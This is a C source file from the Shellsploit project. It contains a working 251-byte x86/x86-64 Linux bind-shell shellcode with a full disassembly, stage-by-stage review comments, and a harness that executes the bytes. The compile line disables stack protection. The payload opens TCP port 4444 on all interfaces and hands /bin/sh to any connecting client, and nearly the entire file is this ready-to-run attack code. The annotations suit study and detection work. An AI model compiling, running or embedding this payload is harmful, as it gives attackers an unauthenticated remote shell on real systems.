/*
[+] Author  : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/Shellsploit
[~] Greetz  : Bomberman,T-Rex,KnocKout,ZoRLu

#If you want to test it, you must compile it on an x86 OS.
#Or you can simply generate it with shellsploit.
#Default settings for port: 4444

Review note on reading this listing: it was produced by a 32-bit
disassembler over the whole buffer, but only offsets 0x00-0x64 are x86
code. The bytes from 0x65 onward are x86-64 code, so the one-byte
"dec eax" (48), "inc ecx" (41), "dec ecx" (49), "dec ebp" (4D) and
"dec esp" (4C) lines there are REX prefixes belonging to the instruction
that follows, and the "mov edi / outsb / das / jnc" run at 0xE5-0xEE is a
single 10-byte 64-bit immediate load. The same applies to byte 40 at
offset 0x02: it is "inc eax" on x86 (clears ZF, so the jz falls through
into the 32-bit path) and a REX prefix on x86-64 (ZF from the xor
survives, so the jz reaches 0x65). Both paths make the same sequence of
calls: socket, bind to port 4444 (word 0x5c11 in memory order), listen,
accept, dup2 onto fds 2..0, execve of /bin/sh.

00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  7460              jz 0x65
00000005  31DB              xor ebx,ebx
00000007  F7E3              mul ebx
00000009  B066              mov al,0x66
0000000B  B301              mov bl,0x1
0000000D  52                push edx
0000000E  53                push ebx
0000000F  6A02              push byte +0x2
00000011  89E1              mov ecx,esp
00000013  CD80              int 0x80
00000015  89C6              mov esi,eax
00000017  B066              mov al,0x66
00000019  43                inc ebx
0000001A  52                push edx
0000001B  6668115C          push word 0x5c11
0000001F  6653              push bx
00000021  89E1              mov ecx,esp
00000023  6A10              push byte +0x10
00000025  51                push ecx
00000026  56                push esi
00000027  89E1              mov ecx,esp
00000029  CD80              int 0x80
0000002B  B066              mov al,0x66
0000002D  B304              mov bl,0x4
0000002F  52                push edx
00000030  56                push esi
00000031  89E1              mov ecx,esp
00000033  CD80              int 0x80
00000035  B066              mov al,0x66
00000037  B305              mov bl,0x5
00000039  52                push edx
0000003A  52                push edx
0000003B  56                push esi
0000003C  89E1              mov ecx,esp
0000003E  CD80              int 0x80
00000040  93                xchg eax,ebx
00000041  31C9              xor ecx,ecx
00000043  B102              mov cl,0x2
00000045  B03F              mov al,0x3f
00000047  CD80              int 0x80
00000049  49                dec ecx
0000004A  79F9              jns 0x45
0000004C  92                xchg eax,edx
0000004D  50                push eax
0000004E  682F2F7368        push dword 0x68732f2f
00000053  682F62696E        push dword 0x6e69622f
00000058  89E3              mov ebx,esp
0000005A  50                push eax
0000005B  53                push ebx
0000005C  89E1              mov ecx,esp
0000005E  50                push eax
0000005F  89E2              mov edx,esp
00000061  B00B              mov al,0xb
00000063  CD80              int 0x80
00000065  48                dec eax
00000066  31C0              xor eax,eax
00000068  48                dec eax
00000069  31FF              xor edi,edi
0000006B  48                dec eax
0000006C  31F6              xor esi,esi
0000006E  48                dec eax
0000006F  31D2              xor edx,edx
00000071  4D                dec ebp
00000072  31C0              xor eax,eax
00000074  6A02              push byte +0x2
00000076  5F                pop edi
00000077  6A01              push byte +0x1
00000079  5E                pop esi
0000007A  6A06              push byte +0x6
0000007C  5A                pop edx
0000007D  6A29              push byte +0x29
0000007F  58                pop eax
00000080  0F05              syscall
00000082  49                dec ecx
00000083  89C0              mov eax,eax
00000085  4D                dec ebp
00000086  31D2              xor edx,edx
00000088  41                inc ecx
00000089  52                push edx
0000008A  41                inc ecx
0000008B  52                push edx
0000008C  C6042402          mov byte [esp],0x2
00000090  66C7442402115C    mov word [esp+0x2],0x5c11
00000097  48                dec eax
00000098  89E6              mov esi,esp
0000009A  41                inc ecx
0000009B  50                push eax
0000009C  5F                pop edi
0000009D  6A10              push byte +0x10
0000009F  5A                pop edx
000000A0  6A31              push byte +0x31
000000A2  58                pop eax
000000A3  0F05              syscall
000000A5  41                inc ecx
000000A6  50                push eax
000000A7  5F                pop edi
000000A8  6A01              push byte +0x1
000000AA  5E                pop esi
000000AB  6A32              push byte +0x32
000000AD  58                pop eax
000000AE  0F05              syscall
000000B0  48                dec eax
000000B1  89E6              mov esi,esp
000000B3  48                dec eax
000000B4  31C9              xor ecx,ecx
000000B6  B110              mov cl,0x10
000000B8  51                push ecx
000000B9  48                dec eax
000000BA  89E2              mov edx,esp
000000BC  41                inc ecx
000000BD  50                push eax
000000BE  5F                pop edi
000000BF  6A2B              push byte +0x2b
000000C1  58                pop eax
000000C2  0F05              syscall
000000C4  59                pop ecx
000000C5  4D                dec ebp
000000C6  31C9              xor ecx,ecx
000000C8  49                dec ecx
000000C9  89C1              mov ecx,eax
000000CB  4C                dec esp
000000CC  89CF              mov edi,ecx
000000CE  48                dec eax
000000CF  31F6              xor esi,esi
000000D1  6A03              push byte +0x3
000000D3  5E                pop esi
000000D4  48                dec eax
000000D5  FFCE              dec esi
000000D7  6A21              push byte +0x21
000000D9  58                pop eax
000000DA  0F05              syscall
000000DC  75F6              jnz 0xd4
000000DE  48                dec eax
000000DF  31FF              xor edi,edi
000000E1  57                push edi
000000E2  57                push edi
000000E3  5E                pop esi
000000E4  5A                pop edx
000000E5  48                dec eax
000000E6  BF2F2F6269        mov edi,0x69622f2f
000000EB  6E                outsb
000000EC  2F                das
000000ED  7368              jnc 0x157
000000EF  48                dec eax
000000F0  C1EF08            shr edi,byte 0x8
000000F3  57                push edi
000000F4  54                push esp
000000F5  5F                pop edi
000000F6  6A3B              push byte +0x3b
000000F8  58                pop eax
000000F9  0F05              syscall
*/
//Project : https://github.com/b3mb4m/Shellsploit
//This file 
//created with shellsploit ..
//19/01/2016 - 00:36:45
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell

/*
 * Payload under test: 251 bytes (offsets 0x00-0xFA) holding an x86 path and
 * an x86-64 path behind a shared five-byte prologue. The literal is split
 * by stage only for readability; adjacent string literals are concatenated
 * by the compiler, so the array contents are unchanged.
 *
 * What an analyst should expect to observe when either path runs:
 *   - a TCP socket bound to port 4444 with an all-zero address field
 *     (i.e. every interface), then listen/accept on it;
 *   - the accepted descriptor duplicated over fds 2, 1 and 0;
 *   - an execve of /bin/sh inheriting those descriptors.
 */
unsigned char shellcode[] =
    /* 0x00-0x04  prologue: xor / byte 0x40 / jz 0x65 selects the path */
    "\x31\xc0\x40\x74\x60"

    /* ---- x86 path: int 0x80, socketcall (eax = 0x66) ---- */
    /* 0x05-0x14  socketcall #1 (socket) */
    "\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80"
    /* 0x15-0x2A  socketcall #2 (bind), port word 0x5c11 = 4444 */
    "\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80"
    /* 0x2B-0x34  socketcall #4 (listen) */
    "\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80"
    /* 0x35-0x3F  socketcall #5 (accept) */
    "\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80"
    /* 0x40-0x4B  dup2 (eax = 0x3f) looped over fds 2, 1, 0 */
    "\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"
    /* 0x4C-0x64  execve (eax = 0x0b) of "/bin//sh" */
    "\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"

    /* ---- x86-64 path: syscall instruction (0f 05) ---- */
    /* 0x65-0x81  socket (eax = 0x29) */
    "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05"
    /* 0x82-0xA4  bind (eax = 0x31), port word 0x5c11 = 4444 */
    "\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
    /* 0xA5-0xAF  listen (eax = 0x32) */
    "\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05"
    /* 0xB0-0xC3  accept (eax = 0x2b) */
    "\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05"
    /* 0xC4-0xDD  dup2 (eax = 0x21) looped over fds 2, 1, 0 */
    "\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6"
    /* 0xDE-0xFA  execve (eax = 0x3b) of "/bin/sh" */
    "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";

/*
 * Test harness: jump into the byte array as if it were a function.
 *
 * The array is ordinary writable data, so the call only succeeds when that
 * mapping is also executable; the compile line above asks for this with
 * -z execstack. NOTE(review): whether that flag extends to data pages
 * depends on the kernel and ABI in use - where W^X is enforced for data
 * the call faults instead. A binary built this way carries an executable
 * GNU_STACK marking, which is itself a useful triage signal.
 */
int main(void)
{
    void (*run_payload)() = (void (*)())shellcode;

    run_payload();
    return 0;
}